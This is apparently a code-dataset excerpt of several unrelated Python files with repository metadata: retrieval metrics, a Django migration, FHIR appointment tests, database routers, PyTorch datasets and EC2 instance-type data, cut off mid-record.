576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | null | null | null |
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | null | null | null |
from gym_Continuous.envs.Continuous_env import ContinuousEnv
#from gym_Continuous.envs.Continuous_extrahard_env import ContinuousExtraHardEnv
| 70.5
| 80
| 0.914894
| 17
| 141
| 7.294118
| 0.529412
| 0.112903
| 0.274194
| 0.33871
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049645
| 141
| 2
| 80
| 70.5
| 0.925373
| 0.560284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b46e977eac20ec33987eb97a90fef9a998a606d1
| 29
|
py
|
Python
|
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | 1
|
2019-04-23T12:17:03.000Z
|
2019-04-23T12:17:03.000Z
|
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | null | null | null |
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | null | null | null |
from VisualCompass import *
| 9.666667
| 27
| 0.793103
| 3
| 29
| 7.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 29
| 2
| 28
| 14.5
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
81f64d18cae955594fcdfbb7ed0515e19665a345
| 5,238
|
py
|
Python
|
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | 6
|
2018-07-31T11:00:59.000Z
|
2021-06-18T06:29:31.000Z
|
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | null | null | null |
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | 1
|
2020-10-15T03:23:29.000Z
|
2020-10-15T03:23:29.000Z
|
import numpy as np
import math
from ruler.measures.cwl_metrics import CWLMetric
'''
Information Foraging Based Measure
@inproceedings{Azzopardi:2018:MUS:3209978.3210027,
author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick},
title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure},
booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval},
series = {SIGIR '18},
year = {2018},
location = {Ann Arbor, MI, USA},
pages = {605--614},
numpages = {10},
}
'''
class IFTGoalCWLMetric(CWLMetric):
def __init__(self, T, b1, R1):
super(CWLMetric, self).__init__()
self.metric_name = "IFT-C1-T={0}-b1={1}-R1={2}".format(T,b1,R1)
self.b1 = b1
self.T = T
self.R1 = R1
self.bibtex = "@inproceedings{Azzopardi:2018:MUS:3209978.3210027," \
"author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick}," \
"title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure}," \
"booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval}," \
"series = {SIGIR '18}," \
"year = {2018}," \
"location = {Ann Arbor, MI, USA}," \
"pages = {605--614}," \
"numpages = {10}," \
"} "
def name(self):
return "IFT-C1-T={0}-b1={1}-R1={2}".format(self.T, self.b1, self.R1)
def c_vector(self, ranking):
cgains = np.cumsum(ranking.gains)
cvec = []
for i in range(0,len(ranking.gains)):
c1 = self.c1_func(cgains[i])
cvec.append(c1)
cvec = np.array(cvec)
return cvec
def c1_func(self, yi):
ex = (1.0 + self.b1 * math.pow(math.e, ((self.T-yi)* self.R1)))
return 1.0 - math.pow(ex,-1.0)
class IFTRateCWLMetric(CWLMetric):
def __init__(self, A, b2, R2):
super(CWLMetric, self).__init__()
self.metric_name = "IFT-C2-A={0}-b2={1}-R2={2}".format(A, b2, R2)
self.b2 = b2
self.A = A
self.R2 = R2
self.bibtex = "@inproceedings{Azzopardi:2018:MUS:3209978.3210027," \
"author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick}," \
"title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure}," \
"booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval}," \
"series = {SIGIR '18}," \
"year = {2018}," \
"location = {Ann Arbor, MI, USA}," \
"pages = {605--614}," \
"numpages = {10}," \
"} "
def name(self):
return "IFT-C2-A={0}-b2={1}-R2={2}".format(self.A, self.b2, self.R2)
def c_vector(self, ranking):
cgains = np.cumsum(ranking.gains)
ccosts = np.cumsum(ranking.costs)
cvec = []
for i in range(0,len(ranking.gains)):
c2 = self.c2_func(cgains[i],ccosts[i])
cvec.append(c2)
cvec = np.array(cvec)
return cvec
def c2_func(self, yi,ki):
ex = (1.0 + self.b2 * math.pow(math.e, ((self.A - (yi/ki))* self.R2)))
return math.pow(ex,-1.0)
class IFTGoalRateCWLMetric(CWLMetric):
def __init__(self, T, b1, R1, A, b2, R2):
super(CWLMetric, self).__init__()
self.metric_name = "IFT-C1-C2-T={0}-b1={1}-R1={2}-A={3}-b2={4}-R2={5}".format(T, b1, R1, A, b2, R2)
self.b1 = b1
self.T = T
self.R1 = R1
self.b2 = b2
self.A = A
self.R2 = R2
self.bibtex = """
@inproceedings{Azzopardi:2018:MUS:3209978.3210027,
author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick},
title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure},
booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval},
series = {SIGIR '18},
year = {2018},
location = {Ann Arbor, MI, USA},
pages = {605--614},
numpages = {10},
}
"""
def name(self):
return "IFT-C1-C2-T={0}-b1={1}-R1={2}-A={3}-b2={4}-R2={5}".format(self.T, self.b1, self.R1, self.A, self.b2, self.R2)
def c_vector(self, ranking):
cgains = np.cumsum(ranking.gains)
ccosts = np.cumsum(ranking.costs)
cvec = []
for i in range(0,len(ranking.gains)):
c1 = self.c1_func(cgains[i])
c2 = self.c2_func(cgains[i],ccosts[i])
cvec.append(c1*c2)
cvec = np.array(cvec)
return cvec
def c2_func(self, yi,ki):
ex = (1.0 + self.b2 * math.pow(math.e, ((self.A - (yi/ki))* self.R2)))
return math.pow(ex,-1.0)
def c1_func(self, yi):
ex = (1.0 + self.b1 * math.pow(math.e, ((self.T-yi)* self.R1)))
return 1.0 - math.pow(ex,-1.0)
| 36.124138
| 141
| 0.54601
| 689
| 5,238
| 4.09434
| 0.161103
| 0.00709
| 0.011344
| 0.054945
| 0.929458
| 0.929458
| 0.922368
| 0.883729
| 0.883729
| 0.847926
| 0
| 0.076313
| 0.302024
| 5,238
| 144
| 142
| 36.375
| 0.695295
| 0
| 0
| 0.711538
| 0
| 0.019231
| 0.337482
| 0.074246
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.028846
| 0.028846
| 0.278846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81fe668029e4ddd8e1022f5573c44375b71e1557
| 2,915
|
py
|
Python
|
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-01-12 10:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='project',
name='contact_firstname',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='contact_function',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='contact_lastname',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='contact_mail',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='contact_phone',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='contact_service',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='ddt_reference_name',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='ddt_reference_service',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='epci_name',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='epci_siren',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='interventions_others',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='manager_other',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='other_perimeter',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='town_insee',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='project',
name='town_name',
field=models.CharField(blank=True, max_length=255),
),
]
| 32.032967
| 63
| 0.565352
| 276
| 2,915
| 5.778986
| 0.206522
| 0.188088
| 0.23511
| 0.272727
| 0.829467
| 0.829467
| 0.829467
| 0.8
| 0.8
| 0.771787
| 0
| 0.032795
| 0.320069
| 2,915
| 90
| 64
| 32.388889
| 0.771948
| 0.022642
| 0
| 0.722892
| 1
| 0
| 0.119115
| 0.007379
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.024096
| 0
| 0.060241
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c30045c1b50153174559d358cf1d70068ac4cbf5
| 6,529
|
py
|
Python
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
from .. import fhirtypes # noqa: F401
from .. import appointment
def test_Appointment_1(base_settings):
filename = (
base_settings["unittest_data_dir"]
/ "appointment-example-request.canonical.json"
)
inst = appointment.Appointment.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Appointment" == inst.resource_type
impl_Appointment_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Appointment" == data["resourceType"]
inst2 = appointment.Appointment(**data)
impl_Appointment_1(inst2)
def impl_Appointment_1(inst):
assert (
inst.comment
== "Further expand on the results of the MRI and determine the next actions that may be appropriate."
)
assert inst.description == "Discussion on the results of your recent MRI"
assert inst.id == "examplereq"
assert (
inst.identifier[0].system == "http://example.org/sampleappointment-identifier"
)
assert inst.identifier[0].value == "123"
assert inst.minutesDuration == 15
assert inst.participant[0].actor.display == "Peter James Chalmers"
assert inst.participant[0].actor.reference == "Patient/example"
assert inst.participant[0].required == "required"
assert inst.participant[0].status == "needs-action"
assert inst.participant[1].required == "required"
assert inst.participant[1].status == "needs-action"
assert inst.participant[1].type[0].coding[0].code == "attending"
assert inst.participant[2].actor.display == "South Wing, second floor"
assert inst.participant[2].actor.reference == "Location/1"
assert inst.participant[2].required == "required"
assert inst.participant[2].status == "accepted"
assert inst.priority == 5
assert inst.reason.text == "Clinical Review"
assert inst.slot[0].reference == "Slot/example"
assert inst.status == "proposed"
assert inst.text.div == "<div>Brian MRI results discussion</div>"
assert inst.text.status == "generated"
assert inst.type.coding[0].code == "52"
assert inst.type.coding[0].display == "General Discussion"
def test_Appointment_2(base_settings):
filename = base_settings["unittest_data_dir"] / "appointment-example.canonical.json"
inst = appointment.Appointment.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Appointment" == inst.resource_type
impl_Appointment_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Appointment" == data["resourceType"]
inst2 = appointment.Appointment(**data)
impl_Appointment_2(inst2)
def impl_Appointment_2(inst):
assert (
inst.comment
== "Further expand on the results of the MRI and determine the next actions that may be appropriate."
)
assert inst.description == "Discussion on the results of your recent MRI"
assert inst.end == datetime(2013, 12, 10, 11, 00, 00, tzinfo=timezone.utc)
assert inst.id == "example"
assert inst.participant[0].actor.display == "Peter James Chalmers"
assert inst.participant[0].actor.reference == "Patient/example"
assert inst.participant[0].required == "required"
assert inst.participant[0].status == "accepted"
assert inst.participant[1].actor.display == "Dr Adam Careful"
assert inst.participant[1].actor.reference == "Practitioner/example"
assert inst.participant[1].required == "required"
assert inst.participant[1].status == "accepted"
assert inst.participant[1].type[0].coding[0].code == "attending"
assert inst.participant[2].actor.display == "South Wing, second floor"
assert inst.participant[2].actor.reference == "Location/1"
assert inst.participant[2].required == "required"
assert inst.participant[2].status == "accepted"
assert inst.priority == 5
assert inst.start == datetime(2013, 12, 10, 9, 00, 00, tzinfo=timezone.utc)
assert inst.status == "booked"
assert inst.text.div == "<div>Brian MRI results discussion</div>"
assert inst.text.status == "generated"
assert inst.type.coding[0].code == "52"
assert inst.type.coding[0].display == "General Discussion"
def test_Appointment_3(base_settings):
filename = (
base_settings["unittest_data_dir"]
/ "appointment-example2doctors.canonical.json"
)
inst = appointment.Appointment.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Appointment" == inst.resource_type
impl_Appointment_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Appointment" == data["resourceType"]
inst2 = appointment.Appointment(**data)
impl_Appointment_3(inst2)
def impl_Appointment_3(inst):
assert (
inst.comment
== "Clarify the results of the MRI to ensure context of test was correct"
)
assert inst.description == "Discussion about Peter Chalmers MRI results"
assert inst.end == datetime(2013, 12, 9, 11, 00, 00, tzinfo=timezone.utc)
assert inst.id == "2docs"
assert inst.participant[0].actor.display == "Peter James Chalmers"
assert inst.participant[0].actor.reference == "Patient/example"
assert inst.participant[0].required == "information-only"
assert inst.participant[0].status == "accepted"
assert inst.participant[1].actor.display == "Dr Adam Careful"
assert inst.participant[1].actor.reference == "Practitioner/example"
assert inst.participant[1].required == "required"
assert inst.participant[1].status == "accepted"
assert inst.participant[2].actor.display == "Luigi Maas"
assert inst.participant[2].actor.reference == "Practitioner/f202"
assert inst.participant[2].required == "required"
assert inst.participant[2].status == "accepted"
assert inst.participant[3].actor.display == "Phone Call"
assert inst.participant[3].required == "information-only"
assert inst.participant[3].status == "accepted"
assert inst.priority == 5
assert inst.start == datetime(2013, 12, 9, 9, 00, 00, tzinfo=timezone.utc)
assert inst.status == "booked"
assert inst.text.div == "<div>Brian MRI results discussion</div>"
assert inst.text.status == "generated"
assert inst.type.coding[0].code == "52"
assert inst.type.coding[0].display == "General Discussion"
| 42.122581
| 109
| 0.695053
| 808
| 6,529
| 5.560644
| 0.175743
| 0.166926
| 0.182284
| 0.058758
| 0.859559
| 0.851547
| 0.817716
| 0.81282
| 0.81282
| 0.784331
| 0
| 0.027917
| 0.177056
| 6,529
| 154
| 110
| 42.396104
| 0.808301
| 0.034768
| 0
| 0.618321
| 0
| 0
| 0.243011
| 0.018742
| 0
| 0
| 0
| 0
| 0.618321
| 1
| 0.045802
| false
| 0
| 0.022901
| 0
| 0.068702
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c37adcad4f542d27da443998e4457b5b0198e4de
| 2,603
|
py
|
Python
|
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | null | null | null |
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | 10
|
2021-08-15T08:48:26.000Z
|
2021-11-25T15:09:27.000Z
|
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | 1
|
2022-01-05T09:16:28.000Z
|
2022-01-05T09:16:28.000Z
|
class PostgresRouter:
# List what contain apps what can use default database.
route_app_labels = {'auth', 'contenttypes', 'sessions', 'admin', 'user', 'vacancies', 'social_django'}
def db_for_read(self, model, **hints):
"""
Attempts to read models in route_app_labels apps go to default db.
"""
if model._meta.app_label in self.route_app_labels:
return 'default'
return None
def db_for_write(self, model, **hints):
"""
Attempts to write models in route_app_labels apps go to default db.
"""
if model._meta.app_label in self.route_app_labels:
return 'default'
return None
def allow_relation(self, obj1, obj2, **hints):
"""
Allow relations if a model in route_app_labels apps is
involved.
"""
if (
obj1._meta.app_label in self.route_app_labels or
obj2._meta.app_label in self.route_app_labels
):
return True
return None
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
Make sure the apps in route_app_labels only appear in the
default db.
"""
if app_label in self.route_app_labels:
return db == 'default'
return None
class MongoRouter:
# List what contain apps what can use mongo database.
route_app_labels = {
'task',
'competition',
'news'
}
def db_for_read(self, model, **hints):
"""
Attempts to read models in route_app_labels apps go to mongo db.
"""
if model._meta.app_label in self.route_app_labels:
return 'mongo'
return None
def db_for_write(self, model, **hints):
"""
Attempts to write models in route_app_labels apps go to mongo db.
"""
if model._meta.app_label in self.route_app_labels:
return 'mongo'
return None
def allow_relation(self, obj1, obj2, **hints):
"""
Allow relations if a model in route_app_labels apps is
involved.
"""
if (
obj1._meta.app_label in self.route_app_labels or
obj2._meta.app_label in self.route_app_labels
):
return True
return None
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
Make sure the apps in route_app_labels only appear in the
mongo db.
"""
if app_label in self.route_app_labels:
return db == 'mongo'
return None
| 29.91954
| 106
| 0.587399
| 337
| 2,603
| 4.31454
| 0.181009
| 0.110041
| 0.192572
| 0.096286
| 0.856946
| 0.856946
| 0.856946
| 0.817056
| 0.817056
| 0.817056
| 0
| 0.00459
| 0.330388
| 2,603
| 86
| 107
| 30.267442
| 0.829604
| 0.24587
| 0
| 0.782609
| 0
| 0
| 0.063037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173913
| false
| 0
| 0
| 0
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
5eecfb09957f1ee02192df44f2832ee6d2bc682e
| 4,979
|
py
|
Python
|
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
import torch
class OneStepDataSetComplex(torch.utils.data.Dataset):
def __init__(self, X, t_grid, x_grid, fcn_data_change=False):
super(OneStepDataSetComplex, self).__init__()
x_n_t = X.shape[1]
t_n_t = t_grid.shape[-1]
s = "{} != {}".format(x_n_t, t_n_t)
assert X.shape[1] == t_grid.shape[-1], s
self.X = torch.tensor(X, dtype=torch.cfloat)
self.t = torch.tensor(t_grid.flatten(), dtype=torch.float)
self.x_grid = torch.tensor(x_grid, dtype=torch.float).view(-1, 1)
self.n_tsteps = self.t.shape[0] - 1
self.n_batches = self.X.shape[0]
self.dataset_len = self.n_tsteps * self.n_batches
self.fcn_data_change = fcn_data_change
# if self.fcn_data_change:
# self.__getitem__ = self._fcn_data_spec
# else:
# self.__getitem__ = self._fno_data_spec
def __getitem__(self, idx):
if self.fcn_data_change:
return self._fcn_data_spec(idx)
else:
return self._fno_data_spec(idx)
def make_x_train(self, x_in):
x_in = torch.view_as_real(x_in)
y = torch.cat([x_in, self.x_grid], axis=1)
return y
def _fno_data_spec(self, idx):
idx_original = idx
t_idx = int(idx % self.n_tsteps) + 1
idx = int(idx // self.n_tsteps)
batch_idx = int(idx % self.n_batches)
x = self.make_x_train(self.X[batch_idx, t_idx - 1]) #.reshape(self.output_shape)
y = self.X[batch_idx, t_idx] #.reshape(self.output_shape)
return x, y
def _fcn_data_spec(self, idx):
idx_original = idx
t_idx = int(idx % self.n_tsteps) + 1
idx = int(idx // self.n_tsteps)
batch_idx = int(idx % self.n_batches)
x = torch.view_as_real(self.X[batch_idx, t_idx - 1]).T
y = torch.view_as_real(self.X[batch_idx, t_idx]).T
return x, y
def __len__(self):
return self.dataset_len
def __repr__(self):
if self.fcn_data_change:
s = 'FCN'
else:
s = 'FNO'
return "OneStepDataSetComplex with length {}, t_grid {}, n_batches {}, data_spec {}".format(self.dataset_len,
self.t,
self.n_batches,
s)
class OneStepDataSetReal(torch.utils.data.Dataset):
def __init__(self, X, t_grid, x_grid, fcn_data_change=False):
super(OneStepDataSetReal, self).__init__()
x_n_t = X.shape[1]
t_n_t = t_grid.shape[-1]
s = "{} != {}".format(x_n_t, t_n_t)
assert X.shape[1] == t_grid.shape[-1], s
self.X = torch.tensor(X, dtype=torch.float)
self.t = torch.tensor(t_grid.flatten(), dtype=torch.float)
self.x_grid = torch.tensor(x_grid, dtype=torch.float).view(-1, 1)
self.n_tsteps = self.t.shape[0] - 1
self.n_batches = self.X.shape[0]
self.dataset_len = self.n_tsteps * self.n_batches
self.fcn_data_change = fcn_data_change
# if self.fcn_data_change:
# self.__getitem__ = self._fcn_data_spec
# else:
# self.__getitem__ = self._fno_data_spec
def __getitem__(self, idx):
if self.fcn_data_change:
return self._fcn_data_spec(idx)
else:
return self._fno_data_spec(idx)
def make_x_train(self, x_in):
y = torch.cat([x_in.view(-1, 1), self.x_grid], axis=1)
return y
def _fno_data_spec(self, idx):
idx_original = idx
t_idx = int(idx % self.n_tsteps) + 1
idx = int(idx // self.n_tsteps)
batch_idx = int(idx % self.n_batches)
x = self.make_x_train(self.X[batch_idx, t_idx - 1]) #.reshape(self.output_shape)
y = self.X[batch_idx, t_idx] #.reshape(self.output_shape)
return x, y
def _fcn_data_spec(self, idx):
idx_original = idx
t_idx = int(idx % self.n_tsteps) + 1
idx = int(idx // self.n_tsteps)
batch_idx = int(idx % self.n_batches)
x = self.X[batch_idx, t_idx - 1].view(1, -1)
y = self.X[batch_idx, t_idx].view(1, -1)
return x, y
def __len__(self):
return self.dataset_len
def __repr__(self):
if self.fcn_data_change:
s = 'FCN'
else:
s = 'FNO'
return "OneStepDataSetReal with length {}, t_grid {}, n_batches {}, data_spec {}".format(self.dataset_len,
self.t,
self.n_batches,
s)
| 39.832
| 117
| 0.525808
| 671
| 4,979
| 3.552906
| 0.084948
| 0.046141
| 0.065436
| 0.065436
| 0.921141
| 0.921141
| 0.921141
| 0.895973
| 0.895973
| 0.895973
| 0
| 0.010722
| 0.363125
| 4,979
| 124
| 118
| 40.153226
| 0.741091
| 0.068488
| 0
| 0.84
| 0
| 0
| 0.037838
| 0.004541
| 0
| 0
| 0
| 0
| 0.02
| 1
| 0.14
| false
| 0
| 0.01
| 0.02
| 0.31
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5efbaaabf00e8a7c895503d91145ab8dc620124b
| 261,826
|
py
|
Python
|
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 3840, 'TotalSizeInGB': 4, 'Disks': [{'SizeInGB': 4, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 4, 'Disks': [{'SizeInGB': 4, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 1024, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 